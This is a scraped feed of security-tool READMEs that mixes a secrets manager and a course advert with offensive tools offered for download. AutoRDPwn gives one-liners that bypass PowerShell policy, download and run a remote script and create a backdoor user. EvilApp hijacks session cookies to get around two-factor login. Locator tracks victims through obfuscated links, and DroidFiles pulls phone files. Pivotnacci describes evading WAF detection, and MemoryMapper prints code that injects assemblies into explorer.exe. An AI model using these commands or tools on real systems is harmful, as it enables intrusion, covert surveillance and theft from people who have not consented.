GuardedBox is an open-source online client-side manager for secure storage and secrets sharing.
It allows users to upload secrets to a centralized server and retrieve them at anytime and from anywhere. It also allows users to share their secrets with other users, individually or via groups.
Secrets are stored encrypted server-side. The encryption is performed client-side by JavaScript code. It is based on ECC-Curve25519 asymmetric encryption and AES256-GCM symmetric encryption. The ECC key pair is generated from the user login credentials during the registration and login processes, by means of PBKDF2.
The server knows the public key of every user. Any user can retrieve the public key of any other user and encrypt a secret for her, in a way that only that user will be able to decrypt it, using his own private key generated from his credentials. This is all done client-side by JavaScript code, minimizing the trust on the server, and using End to End (E2E) encryption between users.
The server does not receive the user password during the login process. Instead, a crypto-challenge is involved using digital signatures based on ECC-EDDSA with ED25519. When a user wants to perform a login, the server sends him a challenge. The user must sign it with his private key and send it back to the server. Again, this is all done client-side by JavaScript code.

Online Service
GuardedBox is deployed online. The official details, notification and communication channels, version information (and changelog) and documentation, as well as the reference to the online service, are available at:

It is a free service for anyone: individuals, companies and organizations!

Technical Documentation and Local Deployment
GuardedBox is a JavaScript and Java/Spring-Boot project:

The back-end is based on Java/Spring-Boot. See the "pom.xml" file and the "java" folder (inside "src/main").
The front-end is based on JavaScript using ReactJS. See the "front" folder (inside "src/main").
The database is MySQL. See the "sql" folder (inside "src/main").

The project can be built via Maven with the following command from its root directory:

mvn clean install

A JAR file (.jar) will be generated in the "target" folder.
The project can be run with the following command from the project root directory:

java -jar target/guardedbox-1.0.0.jar --spring.config.location=file:./config-example/application.properties

It requires a MySQL database instance with the schema described in the file "sql/guardedbox.sql" (inside "src/main").
It also requires an external properties file (the "application.properties" reference in the previous command). An example of a properties file can be found in the "config-example" folder, plus a server digital certificate for HTTPS.
The project is also dockerized. The image is built during the Maven life cycle. The container can be run locally with the following command from the project root directory:

docker-compose up

Make sure the secrets paths (which point to the properties file) are right in the "docker-compose.yml" file.
The image is available at Docker Hub:

https://hub.docker.com/r/s3curitybug/guardedbox/

It still requires, as detailed above, a MySQL database instance and a properties file, plus a server digital certificate for HTTPS.

Contact Details
The GuardedBox project contact details and communication channels are available here!

Download Guardedbox

Geolocator, Ip Tracker, Device Info by URL (Serveo and Ngrok). It uses tinyurl to obfuscate the Serveo link.

Legal disclaimer:
Usage of Locator for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Usage:

git clone https://github.com/thelinuxchoice/locator
cd locator
bash locator.sh

Author: github.com/thelinuxchoice/locator
IG: instagram.com/thelinuxchoice

Download Locator

S3BucketList is a Firefox plugin that records S3 Buckets found in requests. It is currently a work in progress and additional features will be added in the future.

This plugin will also be ported to other browsers in the future. Stay tuned!

Installation
This plugin is already available in Firefox Browser Add-ons.

Built with

HTML - Markup Language
Javascript - Programming Language

Author

Alec Blance

Contributors

Almira Ruby Montalvo - Design

Acknowledgements

FreePik - BucketList logo

Download S3BucketList

Man-in-the-middle phishing attack using an Android app to grab session cookies for any website, which in turn allows to bypass 2-factor authentication protection. EvilApp brings as an example the hijacking and injection of cookies for authenticated instagram sessions.

Legal disclaimer:
Usage of EvilApp for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Requirement:
Android Studio

Tested on Kali Linux 2020.1 x64:

# git clone https://github.com/thelinuxchoice/EvilApp
# cd EvilApp
# bash evilapp.sh

Author: https://github.com/thelinuxchoice/EvilApp
Twitter: https://www.twitter.com/linux_choice

Download EvilApp

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.
Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.
Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements
Powershell 4.0 or higher

Changes

Version 5.1
• Many bugs fixed
• Aesthetic improvements and improved waiting times
• Proxy-Aware connection through system settings
• It is now possible to use the offline tool by downloading the .zip file
• Language auto-detection by pressing the enter key
• Invoke-DCOM has been replaced by SharpRDP
• PowerUp has been replaced by Invoke-PrivescCheck
• Creation of the automatic cleaning subroutine in the victim
• New module available: SMB Shell encrypted with AES
• New module available: Change user with RunAs
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely or to pivot between teams.
When used remotely in a reverse shell, it is necessary to use the following parameters:

Parameter	Description
-admin / -noadmin	Depending on the permissions we have, we will use one or the other
-nogui	This will avoid loading the menu and some colors, guaranteed its functionality
-lang	We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option	As with the menu, we can choose how to launch the attack
-shadow	We will decide if we want to see or control the remote device
-createuser	This parameter is optional, the user AutoRDPwn:AutoRDPwn will be created on the victim machine
-noclean	Disables the process of undoing all changes on the victim computer

Local execution on one line:

powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Example of remote execution on a line:

powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

License
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments
This framework uses the following scripts and tools:
• Chachi-Enumerator by Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Invoke-Phant0m by Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz by Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec by Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper by Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SharpRDP by Steven F -> https://github.com/0xthirteen/SharpRDP
And many more, that do not fit here.. Thanks to all of them and their excellent work.

Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net

Download AutoRDPwn

Working and learning have gone remote, and we have to come to terms with this new reality. Nowadays, several organizations allow their staff to work from home permanently. Most universities consider reducing classroom time wherever possible, and now we are seeing the demand for online courses sky rocket.

Due to this global shift to remote work, unexpected developments such as the increasing number of attacks have ensued. Company executives will now need to strive harder to reduce the risks of data leaks. There is already a surge in demand for information security specialists and trainings. To be competitive, various educational platforms are improving and introducing new techniques.

Hack, learn cybersecurity, and play

There are a wide range of courses related to cybersecurity, but their goal is just to dispense and reiterate materials without actually simulating real-world cases in practice.

Hacktory are professional AppSec, Red and Blue Teams developing their online learning platform to get students through their lived experience regardless of participants IT background.

The Hacktory platform not only provides in-demand hacking skills but also allows to deploy them immediately. To achieve this, they offer the first-of-its-kind immersive learning environment accessible from home just with a browser.

The team has launched cybersecurity courses based on gamification. The platform emulates real-life cases to teach how to use the tools and techniques of ethical hackers.

As of today, two online courses are ready and available for free for those interested in web security, bug bounty, and Java coding. Their expanded versions with no time limitation are offered – at discounted prices through the current pandemic crisis.

Gamified learning process

Gamified learning has proved to be effective both for those who dislike traditional methods of learning and those who are used to offline lectures and seminars. While taking exams, earning hackcoins, and completing practice assignments, students get various achievements to share with friends on social media sites. The more you learn, the more achievements you acquire.

Virtual assistants

Virtual mentors support students and make learning experience more engaging. People are different. Some may prefer to study night time and learn faster in that way when everyone else is sleeping. Virtual mentors have no time preferences and are always here to help night owls or early risers.

Ratings and achievements

The ratings and the achievement systems add competition to the learning process. Every successful assignment gives experience points that can be spent on level-ups and take you closer to the Hall of Fame of the rating system. Upon successful examination, students get a certificate that can be added to their CV.

The in-company ratings are integrated into personal accounts and motivate your employees to do better. Unlock your own set of robots as you learn and succeed.

Web Security and Bug Bounty Course

The Web Security and Bug Bounty course enables to unleash your bug bounty hunting spirit and become a certified pentester. You’ll plunge into the world of ethical hacking with the guidance of bug bounty gurus to have the Midas touch in bug bounty programs.

The course reveals the fundamental security principles of the modern web and bugs finding strategy
It provides a comprehensive understanding of the most common attack tactics and vital countermeasures. Each lesson includes identification and exploitation tasks as well as code correction tasks evaluated by the virtual mentor.
The course features real cases derived from pentesting practice and resources such as HackerOne, OWASP.

Use your full pentesting potential and creativity to embark on an adventurous bug bounty journey!

Java Secure Programming Course

You’ll explore all OWASP TOP 10 vulnerabilities. The lessons have practical tasks – each includes searching for vulnerabilities and then fixing them. After the course you’ll be not only a certified professional but also a security guard of Java code.

The lessons of the Java Secure Programming course will provide you with an opportunity to develop or extend your “black” hacking skills in practice assessments and then – your “white” skills in fixing a source code.
To eliminate a vulnerability, you have to fix a code. You can see all your fixing on a live application right away, and nothing limits your error correction as you can use different techniques.
Please note that this course is under development, and the team is awaiting your feedback as any of your advice may improve the course greatly.

Spreading practical skills in cybersecurity

“As there is a significant rise in screen time in different spheres of human activities particularly in the education sector due to pandemic, companies designing learning solutions cannot remain indifferent. They should participate to facilitate access to knowledge and the outside world “, – Hacktory team concluded.

Many organizations were unprepared for such an unprecedented shift in the workflow, and Hacktory announced that it is open to partnering with schools, universities, and any organizations to contribute to spreading knowledge and practical skills in cybersecurity.

Hacktory will hold free webinars to learn more about web security and bug bounty, you can participate in the first one on Thursday, June 4, 2020 at 1 PM GMT.

You can follow Hacktory on Twitter to stay tuned with their news and updates or contact them at info@hacktory.ai.

Jaeles is a powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner.

Installation
Download precompiled version here.
If you have a Go environment, make sure you have Go >= 1.13 with Go Modules enable and run the following command.

GO111MODULE=on go get github.com/jaeles-project/jaeles

Please visit the Official Documention for more details.

Note: Checkout Signatures Repo for install signature.

Usage

# Scan Usage example:
  jaeles scan -s <signature> -u <url>
  jaeles scan -c 50 -s <signature> -U <list_urls> -L <level-of-signatures>
  jaeles scan -c 50 -s <signature> -U <list_urls>
  jaeles scan -c 50 -s <signature> -U <list_urls> -p 'dest=xxx.burpcollaborator.net'
  jaeles scan -c 50 -s <signature> -U <list_urls> -f 'noti_slack "{{.vulnInfo}}"'
  jaeles scan -v -c 50 -s <signature> -U list_target.txt -o /tmp/output
  jaeles scan -s <signature> -s <another-selector> -u http://example.com
  jaeles scan -G -s <signature> -s <another-selector> -x <exclude-selector> -u http://example.com
  cat list_target.txt | jaeles scan -c 100 -s <signature>


# Examples:
  jaeles scan -s 'jira' -s 'ruby' -u target.com
  jaeles scan -c 50 -s 'java' -x 'tomcat' -U list_of_urls.txt
  jaeles scan -G -c 50 -s '/tmp/custom-signature/.*' -U list_of_urls.txt
  jaeles scan -v -s '~/my-signatures/products/wordpress/.*' -u 'https://wp.example.com' -p 'root=[[.URL]]'
  cat urls.txt | grep 'interesting' | jaeles scan -L 5 -c 50 -s 'fuzz/.*' -U list_of_urls.txt --proxy http://127.0.0.1:8080

More usage can be found here

Showcases can be found here

HTML Report summary

Burp Integration

Plugin can be found here and Video Guide here

Mentions
My introduction slide about Jaeles

Planned Features

Adding more signatures.
Adding more input sources.
Adding more APIs to get access to more properties of the request.
Adding proxy plugins to directly receive input from browser of http client.
~~Adding passive signature for passive checking each request.~~
Adding more action on Web UI.
Integrate with many other tools.

Contribute
If you have some new idea about this project, issue, feedback or found some valuable tool feel free to open an issue for just DM me via @j3ssiejjj. Feel free to submit new signature to this repo.

Credits

Special thanks to chaitin team for sharing ideas to me for build the architecture.
React components is powered by Carbon and carbon-tutorial.
Awesomes artworks are powered by Freepik at flaticon.com.

Download Jaeles

FinalRecon is a fast and simple python script for web reconnaissance. It follows a modular structure so in future new modules can be added with ease.

Featured

NullByte

Hakin9

https://hakin9.org/final-recon-osint-tool-for-all-in-one-web-reconnaissance/

Features
FinalRecon provides detailed information such as :

Header Information
Whois
SSL Certificate Information
Crawler
- html
  - CSS
  - Javascripts
  - Internal Links
  - External Links
  - Images
- robots
- sitemaps
- Links inside Javascripts
- Links from Wayback Machine from Last 1 Year
DNS Enumeration
- A, AAAA, ANY, CNAME, MX, NS, SOA, TXT Records
- DMARC Records
Subdomain Enumeration
- Data Sources
  - BuffOver
  - crt.sh
  - ThreatCrowd
  - AnubisDB
  - ThreatMiner
  - Facebook Certificate Transparency API
    - Auth Token is Required for this source, read Configuration below
Traceroute
- Protocols
  - UDP
  - TCP
  - ICMP
Directory Searching
- Support for File Extensions
- Directories from Wayback Machine from Last 1 Year
Port Scan
- Fast
- Top 1000 Ports
- Open Ports with Standard Services
Export
- Formats
  - txt
  - xml
  - csv

Configuration

API Keys
Some Modules Use API Keys to fetch data from different resources, these are optional, if you are not using an API key, they will be simply skipped. If you are interested in using these resources you can store your API key in keys.json file.
Path --> finalrecon/conf/keys.json
If you dont want to use a key for a certain data source just set its value to null, by default values of all available data sources are null.

Facebook Developers API
This data source is used to fetch Certificate Transparency data which is used in Subdomain Enumeration
Key Format : APP-ID|APP-SECRET
Read More : https://developers.facebook.com/docs/facebook-login/access-tokens

Tested on

Kali Linux
BlackArch Linux

FinalRecon is a tool for Pentesters and it's designed for Linux based Operating Systems, other platforms like Windows and Termux are NOT supported.

Installation

BlackArch Linux

pacman -S finalrecon

Kali Linux

git clone https://github.com/thewhiteh4t/FinalRecon.git
cd FinalRecon
pip3 install -r requirements.txt

Docker

docker pull thewhiteh4t/finalrecon
docker run -it --entrypoint /bin/sh thewhiteh4t/finalrecon

Usage

python3 finalrecon.py -h

usage: finalrecon.py [-h] [--headers] [--sslinfo] [--whois] [--crawl] [--dns] [--sub] [--trace] [--dir] [--ps]
                     [--full] [-t T] [-T T] [-w W] [-r] [-s] [-d D] [-e E] [-m M] [-p P] [-tt TT] [-o O]
                     url

FinalRecon - The Last Recon Tool You Will Need | v1.0.7

positional arguments:
  url         Target URL

optional arguments:
  -h, --help  show this help message and exit
  --headers   Header Information
  --sslinfo   SSL Certificate Information
  --whois     Whois Lookup
  --crawl     Crawl Target
  --dns       DNS Enumeration
  --sub       Sub-Domain Enumeration
  --trace     Traceroute
  --dir       Directory Search
  --ps        Fast Port Scan
  --full      Full Recon

Extra Options:
  -t T        Number of Threads [ Default : 30 ]
  -T T        Request Timeout [ Default : 30.0 ]
  -w W        P   ath to Wordlist [ Default : wordlists/dirb_common.txt ]
  -r          Allow Redirect [ Default : False ]
  -s          Toggle SSL Verification [ Default : True ]
  -d D        Custom DNS Servers [ Default : 1.1.1.1 ]
  -e E        File Extensions [ Example : txt, xml, php ]
  -m M        Traceroute Mode [ Default : UDP ] [ Available : TCP, ICMP ]
  -p P        Port for Traceroute [ Default : 80 / 33434 ]
  -tt TT      Traceroute Timeout [ Default : 1.0 ]
  -o O        Export Output [ Default : txt ] [ Available : xml, csv ]

# Check headers

python3 finalrecon.py --headers <url>

# Check ssl Certificate

python3 finalrecon.py --sslinfo <url>

# Check whois Information

python3 finalrecon.py --whois <url>

# Crawl Target

python3 finalrecon.py --crawl <url>

# Directory Searching

python3 finalrecon.py --dir <url> -e txt,php -w /path/to/wordlist

# full scan

python3 finalrecon.py --full <url>

Demo

Download FinalRecon

QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of session hijacking affecting all applications that rely on the “Login with QR code” feature as a secure way to login into accounts. In a nutshell, the victim scans the attacker’s QR code which results in session hijacking.

Features:

Port Forwarding using Ngrok

Legal disclaimer:
Usage of OhMyQR for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Usage:

git clone https://github.com/thelinuxchoice/ohmyqr
cd ohmyqr
bash ohmyqr.sh

Author: https://github.com/thelinuxchoice/ohmyqr
Twitter: https://twitter.com/linux_choice

Download Ohmyqr

Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server which communicates with HTTP agents. The architecture looks like the following:

This tool was inspired by the great reGeorg. However, it includes some improvements:

Support for balanced servers
Customizable polling interval, useful to reduce detection rates
Auto drop connections closed by a server
Modular and cleaner code
Installation through pip
Password-protected agents

Supported socks protocols

Socks 4
Socks 5
- No authentication
- User password
- GSSAPI

Installation
From python packages:

pip3 install pivotnacci

From repository:

git clone https://github.com/blackarrowsec/pivotnacci.git
cd pivotnacci/
pip3 install -r requirements.txt # to avoid installing on the OS
python3 setup.py install # to install on the OS

Usage

Upload the required agent (php, jsp or aspx) to a webserver
Start the socks server once the agent is deployed
Configure proxychains or any other proxy client (the default listening port for pivotnacci socks server is 1080)

$ pivotnacci -h
usage: pivotnacci [-h] [-s addr] [-p port] [--verbose] [--ack-message message]
                  [--password password] [--user-agent user_agent]
                  [--header header] [--proxy [protocol://]host[:port]]
                  [--type type] [--polling-interval milliseconds]
                  [--request-tries number] [--retry-interval milliseconds]
                  url

Socks server for HTTP agents

positional arguments:
  url                   The url of the agent

optional arguments:
  -h, --help            show this help message and exit
  -s addr, --source addr
                        The default listening address (default: 127.0.0.1)
  -p port, --port port  The default listening port (default: 1080)
  --verbose, -v
  --ack-message message, -a message
                        Message returned by the agent web page (default:
                        Server Error    500 (Internal Error))
  --password password   Password to communicate with the agent (default: )
  --user-agent user_agent, -A user_agent
                        The User-Agent header sent to the agent (default:
                        pivotnacci/0.0.1)
  --header header, -H header
                        Send custom header. Specify in the form 'Name: Value'
                        (default: None)
  --proxy [protocol://]host[:port], -x [protocol://]host[:port]
                        Set the HTTP proxy to use.(Environment variables
                        HTTP_PROXY and HTTPS_PROXY are also supported)
                        (default: None)
  --type type, -t type  To specify agent type in case is not automatically
                        detected. Options are ['php', 'jsp', 'aspx'] (default:
                        None)
  --polling-interval milliseconds
                        Interval to poll the agents (for recv ope   rations)
                        (default: 100)
  --request-tries number
                        The number of retries for each request to an agent. To
                        use in case of balanced servers (default: 50)
  --retry-interval milliseconds
                        Interval to retry a failure request (due a balanced
                        server) (default: 100)

Examples
Using an agent with password s3cr3t (AGENT_PASSWORD variable must be modified at the agent side as well):

pivotnacci  https://domain.com/agent.php --password "s3cr3t"

Using a custom HTTP Host header and a custom CustomAgent User-Agent:

pivotnacci  https://domain.com/agent.jsp -H 'Host: vhost.domain.com' -A 'CustomAgent'

Setting a different agent message 418 I'm a teapot (ACK_MESSAGE variable must be modified at the agent side as well):

pivotnacci https://domain.com/agent.aspx --ack-message "418 I'm a teapot"

Reduce detection rate (e.g. WAF) by setting the polling interval to 2 seconds:

pivotnacci  https://domain.com/agent.php --polling-interval 2000

Author
Eloy Pérez (@Zer1t0) [ www.blackarrow.net - www.tarlogic.com ]

Download Pivotnacci

RepoPeek is a Python script to get details about a repository without cloning it. All the information are retrieved using the GitHub API.
Please Note: API requests made by this module aren't using basic authentication or OAuth. Therefore the rate limit allows for up to 60 requests per hour. Unauthenticated requests are associated with the originating IP address.

Information Provided

Basic information about the repository.
- Repository Name
- Default Branch
- Repository Size
- Repository License
- Repository Description
Languages used in the repository.
Repository Statistics.
- Forks
- Watchers
- Open Issues
- Total Stars
URL's of the repository.
- GIT URL
- SSH URL
- SVN URL
- Clone URL

Installation
To install this script so that it is accessible via Python from anywhere, copy the script into a directory of your choice, and then add that directory to your PYTHONPATH

Usage

python -m repopeek

Support & Contributions

Please ⭐️ this repository if this project helped you!
Contributions of any kind welcome!

Download RepoPeek

Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis

wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

Python stuff and Celery

You must install the libraries inside requirements.txt

python3 -m pip install-r requirements.txt

Install Frontend

Node

First of all, install nodejs.

Dependencias

Inside the directory frontend install the dependencies

cd frontend

npm install

Wake up iKy Tool

Turn on Backend

Redis

Turn on the server in a terminal

redis-server

Python stuff and Celery

Turn on Celery in another terminal, within the directory backend

./celery.sh

Again, in another terminal turn on backend app from directory backend

python3 app.py

Turn on Frontend

Finally, to run frontend server, execute the following command from directory frontend

npm start

Screen after turn on iKy

Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.
Fullcontact: Generate the APIs from here
Twitter: Generate the APIs from here
Linkedin: Only the user and password of your account must be loaded
HaveIBeenPwned : Generate the APIs from here (Paid)
Emailrep.io : Generate the APIs from here

Wiki

iKy Wiki
iKy Page
Installation
Easy Install
Vagrant
Manual install (Compacted)
Manual install (Detailed)
Update
Soft Update
Wake Up
Turn on the project
APIs
APIs through frontend
APIs through backend
Backend
Backend through URL
Videos
Installation videos
Installation in Kali 2019
Installation in ubuntu 18.04
Installation in ubuntu 16.04
Demo videos
iKy eko15
iKy version 2
Testing iKy with Emiliano
Testing iKy with Giba
iKy version 1
iKy version 0
Disclaimer

Demo Videos

iKy eko15

iKy Version 2

Testing iKy with Emiliano

Testing iKy with Giba

iKy version 1

iKy version 0

Disclaimer

Anyone who contributes or contributed to the project, including me, is not responsible for the use of the tool (Neither the legal use nor the illegal use, nor the "other" use).

Keep in mind that this software was initially written for a joke, then for educational purposes (to educate ourselves), and now the goal is to collaborate with the community making quality free software, and while the quality is not excellent (sometimes not even good) we strive to pursue excellence.

Consider that all the information collected is free and available online, the tool only tries to discover, collect and display it. Many times the tool cannot even achieve its goal of discovery and collection. Please load the necessary APIs before remembering my mother. If even with the APIs it doesn't show "nice" things that you expect to see, try other e-mails before you remember my mother. If you still do not see the "nice" things you expect to see, you can create an issue, contact us by e-mail or by any of the RRSS, but keep in mind that my mother is neither the creator nor Contribute to the project.

We do not refund your money if you are not satisfied. I hope you enjoy using the tool as much as we enjoy doing it. The effort was and is enormous (Time, knowledge, coding, tests, reviews, etc.) but we would do it again. Do not use the tool if you cannot read the instructions and / or this disclaimer clearly.

By the way, for those who insist on remembering my mother, she died many years ago but I love her as if she were right here.

Download Project iKy v2.6.0

Memory Mapper is a lightweight library which allows the ability to map both native and managed assemblies into memory by either using process injection of a process specified by the user or self-injection; the technique of injecting an assembly into the currently running process attempting to do the injection. The library comes with tools not only to map assemblies, but with the capabilities to encrypt, decrypt, and generate various amounts of cryptographically strong data.

Requirements
Note:(For the running assembly using Memory Mapper ONLY— not for stubs/shellcode)

Windows 7 SP1 & Higher
.NET Framework 4.6.1

Features

Explore the structure of a PE (portable executable)
Read resources from both managed and native assemblies
Map native assemblies into memory using process injection and self-injection
Map managed assemblies into memory using process injection and other techniques
Obtain an array of bytes for any file of any file size
Encrypt and decrypt entire files and raw bytes
Generate and validate checksums of files and raw bytes
Generate cryptographically strong random data using a SecureRandom object
Comes bundled with multiple encryption and hashing algorithms

Encryption
- AES (ECB)
- AES (CBC)
- AES (CFB)
- AES (OFB)
- AES (CTR)
Hashing
- MD5
- RIPEMD160
- SHA1
- SHA256
- SHA384
- SHA512

Examples

Native Injection
This example shows how to statically map a native assembly into memory using the NativeLoader tool. The example loads the file by reading all of its bytes from disk and then injects the PE (portable executable) associated with the bytes directly into memory. Using the native loader in conjunction with Dynamic Code Compilation found in my Amaterasu library one could accomplish on-the-fly code compilation and injection all from code in-memory.

using System;
using System.IO;
using System.Reflection;
using MemoryMapper;

namespace Example
{
    class Program
    {
        static void Main(string[] args)
        {
            // Get the bytes of the file we want to load.
            var filePath = "FileToReadBytesOf";
            var fileBytes = File.ReadAllBytes(filePath);

            // Check if the assembly is managed or native.
            bool isManaged = false;
            try
            {
                // Note — this is one of the simplest variations of checking assemblies
                var assemblyName = AssemblyName.GetAssemblyName(filePath);
                if (assemblyName != null)
                    if (assemblyName.FullName != null)
                        isManaged = true;
            }
            catch { isManaged = false; }

            // Try loading the assembly if it's tr   uly native.
            if (!isManaged)
            {
                NativeLoader loader = new NativeLoader();
                if (loader.LoadAssembly(fileBytes))
                    Console.WriteLine("Assembly loaded successfully!");
                else
                    Console.WriteLine("Assembly could not be loaded.");
            }

            // Wait for user interaction.
            Console.Read();
        }
    }
}

Managed Injection
This example shows how to statically map a managed assembly into memory by reading in its bytes — or by using an embedded byte array — and then using the ManagedLoader to inject into a currently running process. Almost any managed assembly can be mapped using the provided ManagedLoader tool.

using System;
using System.IO;
using System.Reflection;
using MemoryMapper;

namespace Example
{
    class Program
    {
        static void Main(string[] args)
        {
            // Get the bytes of the file we want to load.
            var filePath = "FileToReadBytesOf";
            var fileBytes = File.ReadAllBytes(filePath);

            // Check if the assembly is managed or native.
            bool isManaged = false;
            try
            {
                // Note — this is one of the simplest variations of checking assemblies
                var assemblyName = AssemblyName.GetAssemblyName(filePath);
                if (assemblyName != null)
                    if (assemblyName.FullName != null)
                        isManaged = true;
            }
            catch { isManaged = false; }

            // Try loading the assembly if it's tr   uly managed.
            if (isManaged)
            {
                // Set the name of a surrogate process - the process we'll inject into.
                var processName = "explorer.exe"; // Can also be the current process's name for self-injection.
                ManagedLoader loader = new ManagedLoader();
                if (loader.LoadAssembly(fileBytes, processName))
                    Console.WriteLine("Assembly loaded successfully!");
                else
                    Console.WriteLine("Assembly could not be loaded.");
            }

            // Wait for user interaction.
            Console.Read();
        }
    }
}

Credits
Icon:DesignBolts
http://www.designbolts.com/

Download MemoryMapper

All-in-one tool for managing vulnerability reports

Why
The goal of Purify to be an easy-in-use and efficient tool to simplify a workflow of managing vulnerabilities delivered from various tools.
Purify is designed to analyze the report of any tool, if the report is in JSON or XML format. This means you don't need any special plug-ins to process reports from your selection of tools.
Purify is able to remove duplicate results among various vulnerability scanners or tools. In addition, it can combine several results of the same tool based on some fields and it is fully configurable (no coding required). Purify does all this work to reduce the headache of the analyst.
Collect all security findings in one place, review/validate/track them, collaborate, get notifications(Slack), export them into tracking systems(Jira) and so on.

Documentation (WIP)
https://faloker.gitbook.io/purify

Built With

Nest - The web framework used
Vuetify - Material Component Framework for Vue

Download Purify

Get files from Android directories, internal and external storage (Pictures, Downloads, Whatsapp, Videos, ...)

Legal disclaimer:
Usage of DroidFiles for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Requirements:
Android Studio (https://developer.android.com/studio)

Usage:

# git clone https://github.com/thelinuxchoice/droidfiles
# cd droidfiles
# bash droidfiles.sh

Author: https://github.com/thelinuxchoice/droidfiles
twitter: https://twitter.com/linux_choice

Download Droidfiles

ANDRAX is a Penetration Testing platform developed specifically for Android smartphones, ANDRAX has the ability to run natively on Android so it behaves like a common Linux distribution, But more powerful than a common distribution!

The development of ANDRAX began on 08/09/2016 (DD/MM/YYYY) only for people in Brazil
ANDRAX has been fully redefined and reloaded on 05/10/2018 (DD/MM/YYYY) open to the international public.

ANDRAX enable to all Android device with root access enabled and a good unlocked rom become a weapon for advanced Penetration Testing.

Why is Android so powerful?

Simple, everyone has a smartphone and spends all the time with it! We have the possibility to camouflage easily in the middle of everyone, the processor architecture of most Android smartphones is ARM a modern and robust architecture extremely superior to the rest, With touch screens we can run the tools with great agility and take advantage of the graphical interface of Android, we can get in almost anywhere with our smartphones...

In technical terms, ANDRAX and NetHunter should never be compared, ANDRAX is a penetration testing platform for Android smartphones and NetHunter is just a Debian emulator running with chroot.

Termux is not our enemy, Termux is an application that allows installation of many Linux packages using a Debian environment running natively on Android.

ANDRAX and Termux have a similar development, ANDRAX and Termux share many libs and GNU/Linux resources.

But Termux is not a penetration testing platform, it's software to bring basic tools found in a Debian environment. Penetration tests are not something basic! But advanced techniques that involve advanced tools and a advanced environment to conduct good tests!

So you can install many tools manually in Termux but it would be extremely difficult to optimize and configure them to take 100% of the required potential for penetration testing.

Termux runs without root privileges and this makes it very difficult to use advanced tools.

ANDRAX promotes the use of more than 900 advanced tools for Hacking, Cracking and Penetration Testing.

Screenshots

More info in official site.

Download ANDRAX

ADCollector is a lightweight tool that enumerates the Active Directory environment to identify possible attack vectors. It will give you a basic understanding of the configuration/deployment of the environment as a starting point.

Notes:
ADCollector is not an alternative to the powerful PowerView, it just automates enumeration to quickly identify juicy information without thinking too much at the early Recon stage. Functions implemented in ADCollector are ideal for enumeration in a large Enterprise environment with lots of users/computers, without generating lots of traffic and taking a large amount of time. It only focuses on extracting useful attributes/properties/ACLs from the most valuable targets instead of enumerating all available attributes from all the user/computer objects in the domain. You will definitely need PowerView to do more detailed enumeration later.
The aim of developing this tool is to help me learn more about Active Directory security in a different perspective as well as to figure out what's behind the scenes of those PowerView functions. I just started learning .NET with C#, the code could be really terrible~
It uses S.DS namespace to retrieve domain/forest information from the domain controller(LDAP server). It also utilizes S.DS.P namespace for LDAP searching.
This tool is still under construction. Features will be implemented can be seen from my project page

Enumeration

Current Domain/Forest information
Domains in the current forest (with domain SIDs)
Domain Controllers in the current domain [GC/RODC] (with ~~IP,OS Site and ~~Roles)
Domain/Forest trusts as well as trusted domain objects[SID filtering status]
Privileged users (currently in DA and EA group)
Unconstrained delegation accounts (Excluding DCs)
Constrained Delegation (S4U2Self, S4U2Proxy, Resources-based constrained delegation)
MSSQL/Exchange/RDP/PS Remoting SPN accounts
User accounts with SPN set & password does not expire account
Confidential attributes ()
ASREQROAST (DontRequirePreAuth accounts)
AdminSDHolder protected accounts
Domain attributes (MAQ, minPwdLength, maxPwdAge lockoutThreshold, gpLink[group policies that linked to the current domain object])
LDAP basic info(supportedLDAPVersion, supportedSASLMechanisms, domain/forest/DC Functionality)
Kerberos Policy
Interesting ACLs on the domain object, resolving GUIDs (User defined object in the future)
Unusual DCSync Accounts
Interesting ACLs on GPOs
